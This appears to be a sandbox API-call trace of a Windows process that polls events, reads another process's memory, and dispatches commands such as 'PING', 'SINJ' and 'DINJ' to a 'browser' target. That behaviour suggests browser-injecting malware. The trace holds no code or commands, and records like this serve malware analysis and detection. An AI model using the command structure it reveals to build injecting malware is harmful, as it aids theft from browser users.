	[0229.352] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.352] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.353] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0229.353] Sleep (dwMilliseconds=0xbb8) 
	[0229.369] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.370] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.370] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.370] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.370] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0229.370] Sleep (dwMilliseconds=0xbb8) 
	[0229.384] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.384] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.384] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.384] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.384] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0229.384] Sleep (dwMilliseconds=0xbb8) 
	[0229.399] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.399] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.399] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.399] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.399] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0229.399] Sleep (dwMilliseconds=0xbb8) 
	[0229.414] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.414] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.414] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.414] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.414] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0229.414] Sleep (dwMilliseconds=0xbb8) 
	[0229.435] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.435] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.435] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.435] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.435] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0229.435] Sleep (dwMilliseconds=0xbb8) 
	[0229.445] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.445] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.445] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.446] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.446] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0229.446] Sleep (dwMilliseconds=0xbb8) 
	[0229.461] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.461] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.461] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.461] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.461] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0229.461] Sleep (dwMilliseconds=0xbb8) 
	[0229.477] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0229.477] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225e30
	[0229.477] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22b30b8
	[0229.477] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225eb8
	[0229.477] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0229.477] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225e30, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225e30*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0229.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0229.477] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7728
	[0229.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x22b7728, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0229.477] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x22b30b8, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22b30b8, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0229.477] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225eb8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225eb8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0229.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0229.477] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778938
	[0229.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x2778938, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0229.477] SetEvent (hEvent=0x474) returned 1
	[0229.477] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0229.477] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b30b8) returned 1
	[0229.477] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225eb8) returned 1
	[0229.477] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778988
	[0229.477] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0229.477] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0229.478] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0229.478] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0229.478] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0229.478] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7758
	[0229.478] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2778a00, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd80) returned 0x5ec
	[0229.478] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b18
	[0229.478] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.478] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.478] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.478] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b18) returned 1
	[0229.478] Sleep (dwMilliseconds=0xbb8) 
	[0229.492] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.492] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.492] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.492] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.492] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b18) returned 1
	[0229.492] Sleep (dwMilliseconds=0xbb8) 
	[0229.508] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.508] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.508] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.508] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.508] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b18) returned 1
	[0229.508] Sleep (dwMilliseconds=0xbb8) 
	[0229.523] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.523] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.524] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.524] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.524] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b18) returned 1
	[0229.524] Sleep (dwMilliseconds=0xbb8) 
	[0229.539] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.539] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.540] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.540] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.540] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.540] Sleep (dwMilliseconds=0xbb8) 
	[0229.555] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.555] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.555] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.555] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.555] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.555] Sleep (dwMilliseconds=0xbb8) 
	[0229.571] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.571] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.571] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.571] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.571] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.571] Sleep (dwMilliseconds=0xbb8) 
	[0229.587] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.587] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.587] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.587] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.587] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.587] Sleep (dwMilliseconds=0xbb8) 
	[0229.601] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.601] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.602] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.602] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.602] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.602] Sleep (dwMilliseconds=0xbb8) 
	[0229.617] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.618] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.618] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.618] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.618] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.618] Sleep (dwMilliseconds=0xbb8) 
	[0229.634] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.634] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.634] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.634] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.634] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.634] Sleep (dwMilliseconds=0xbb8) 
	[0229.649] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.649] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.649] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.649] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.649] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.649] Sleep (dwMilliseconds=0xbb8) 
	[0229.664] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.664] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.664] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.664] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.664] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.664] Sleep (dwMilliseconds=0xbb8) 
	[0229.680] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.680] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.680] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.680] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.680] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.680] Sleep (dwMilliseconds=0xbb8) 
	[0229.695] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.695] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.695] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.695] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.695] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.695] Sleep (dwMilliseconds=0xbb8) 
	[0229.711] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.711] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.711] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.711] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.711] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.711] Sleep (dwMilliseconds=0xbb8) 
	[0229.726] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.726] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.726] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.726] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.727] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.727] Sleep (dwMilliseconds=0xbb8) 
	[0229.742] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.742] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.742] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.742] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.742] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.742] Sleep (dwMilliseconds=0xbb8) 
	[0229.758] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.758] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.758] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.758] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.758] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.758] Sleep (dwMilliseconds=0xbb8) 
	[0229.774] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.774] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.774] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.774] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.774] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.774] Sleep (dwMilliseconds=0xbb8) 
	[0229.789] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.789] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.790] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.790] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.790] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.790] Sleep (dwMilliseconds=0xbb8) 
	[0229.805] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.805] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.805] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.805] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.806] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a28) returned 1
	[0229.806] Sleep (dwMilliseconds=0xbb8) 
	[0229.851] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.851] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.851] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.851] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.851] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231d0f8) returned 1
	[0229.851] Sleep (dwMilliseconds=0xbb8) 
	[0229.962] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0229.962] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0229.962] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0229.962] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0229.962] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231de40) returned 1
	[0229.962] Sleep (dwMilliseconds=0xbb8) 
	[0230.054] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0230.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2259f0
	[0230.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22b30b8
	[0230.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0230.054] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0230.054] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x2259f0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2259f0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0230.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0230.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b77d0
	[0230.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x22b77d0, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0230.054] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x22b30b8, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22b30b8, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0230.054] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x2255b0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2255b0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0230.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0230.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231eb60
	[0230.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x231eb60, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0230.054] SetEvent (hEvent=0x474) returned 1
	[0230.055] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2259f0) returned 1
	[0230.055] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b30b8) returned 1
	[0230.055] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0230.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231eb88
	[0230.055] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0230.055] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0230.055] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0230.055] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0230.055] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0230.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7800
	[0230.055] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x231eb38, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd88) returned 0x610
	[0230.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ebb0
	[0230.055] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0230.055] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0230.055] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0230.055] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ebb0) returned 1
	[0230.055] Sleep (dwMilliseconds=0xbb8) 
	[0233.086] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0233.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b88
	[0233.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22eb8b0
	[0233.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225da8
	[0233.087] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0233.087] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225b88, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225b88*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0233.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0233.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe58
	[0233.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x22ffe58, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0233.087] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x22eb8b0, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22eb8b0, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0233.087] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225da8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225da8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0233.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225da8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0233.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777d58
	[0233.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225da8, cbMultiByte=-1, lpWideCharStr=0x2777d58, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0233.087] SetEvent (hEvent=0x474) returned 1
	[0233.087] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b88) returned 1
	[0233.087] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22eb8b0) returned 1
	[0233.087] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225da8) returned 1
	[0233.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27785a0
	[0233.087] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0233.087] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0233.087] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0233.087] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0233.087] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0233.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff9d8
	[0233.088] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27782a8, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd7c) returned 0x5fc
	[0233.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27786b8
	[0233.088] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
